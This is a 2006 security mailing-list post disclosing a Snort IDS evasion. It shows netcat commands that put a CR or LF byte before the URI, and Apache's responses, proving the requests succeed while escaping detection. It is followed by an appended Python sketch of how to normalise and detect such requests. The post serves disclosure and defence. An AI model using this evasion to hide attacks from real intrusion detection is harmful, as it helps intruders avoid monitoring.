Dailydave mailing list archives
Re: New Snort Bypass - Patch - Bypass of Patch
From: Sigint Consulting <info () sigint-consulting com>
Date: Sat, 03 Jun 2006 10:41:24 -0700
> I performed this research while developing NFR's web signatures, and found that all web servers I tested (several years ago) handled end-of-lines using "\x0d\x0a" and "\x0a" interchangeably. If you find a web server that interprets "index.php" in the example above as an actual filename, I for one would be very interested in knowing about it.
>
> Dodge
Apache 1.3.34 (debian package) returns index.html from my request as normal even though the file name has a \x0d before it. So in Apache's case it appears that the \x0d character will not mess up the request to the webserver, at least in this case AND still bypasses the snort check. Now obviously the \x90\x90 are going to ruin the request because no such file exists by that name, so they were left out of this example, but this may mean the \x0d character would not mangle a real malicious request to apache.

$ perl -e 'print "GET \x0d/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
HTTP/1.1 200 OK
Date: Mon, 05 Jun 2006 07:25:47 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Sat, 03 Jun 2006 09:24:26 GMT
ETag: "6f9d3-4d-4481554a"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/html; charset=iso-8859-1

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding . . .
$

Further research on the snort vulnerability reveals that the \x0a character will also evade the snort preprocessor AND apache will return a valid response. (Testing \x0a before a malicious unicode string did not generate a snort alert)

$ perl -e 'print "GET \x0a/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding . . .
$

Chris

--------------------------------
www.sigint-consulting.com
info () sigint-consulting com
Charlotte, North Carolina
Information Security Consulting
--------------------------------
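As an added illustration, not code from the thread or from Snort, the following Python sketch shows the detection-side problem Chris's tests expose: a request-line parser that splits strictly on spaces leaves the stray \x0d or \x0a glued to the front of the URI, so a path-anchored signature never fires, while a parser that strips bare CR/LF between method and path (mirroring the permissive server behaviour observed above) matches again. The sample requests and the helper names (naive_uri, normalized_uri, request_line_is_anomalous) are constructed for this example.

```python
import re

# Constructed sample requests (not captured traffic): a clean request line and
# the two variants from the thread, with a CR or LF inserted before the path.
SAMPLE_REQUESTS = {
    "clean": b"GET /index.html HTTP/1.0\r\n\r\n",
    "cr":    b"GET \x0d/index.html HTTP/1.0\r\n\r\n",
    "lf":    b"GET \x0a/index.html HTTP/1.0\r\n\r\n",
}


def request_line(request: bytes) -> bytes:
    """First line of the request, taking CRLF as the only line terminator."""
    return request.split(b"\r\n", 1)[0]


def naive_uri(request: bytes) -> bytes:
    """Strict split on SP: a leading CR/LF stays part of the 'URI', so a
    signature anchored at the start of the path never matches the variants."""
    parts = request_line(request).split(b" ")
    return parts[1] if len(parts) > 1 else b""


def normalized_uri(request: bytes) -> bytes:
    """Strip bare CR/LF bytes between method and path before matching, which
    mirrors the permissive handling the thread observed on the server side."""
    m = re.match(rb"[A-Z]+[ \r\n]+([^ ]+)", request_line(request))
    return m.group(1) if m else b""


def request_line_is_anomalous(request: bytes) -> bool:
    """Check independent of any URI signature: a bare CR or LF inside the
    request line is never legitimate, so its presence alone merits an alert."""
    return re.search(rb"[\r\n]", request_line(request)) is not None


def uri_matches(request: bytes, pattern: bytes, extractor) -> bool:
    """Apply a path-anchored URI signature (hypothetical rule) via the given extractor."""
    return re.match(pattern, extractor(request)) is not None


if __name__ == "__main__":
    sig = rb"/index\.html"  # hypothetical path-anchored signature
    for name, req in SAMPLE_REQUESTS.items():
        print(name,
              "naive:", uri_matches(req, sig, naive_uri),
              "normalized:", uri_matches(req, sig, normalized_uri),
              "anomalous line:", request_line_is_anomalous(req))
```

Running it shows the naive extractor matching only the clean request while the normalized one matches all three, and the anomaly check flagging both variants on its own.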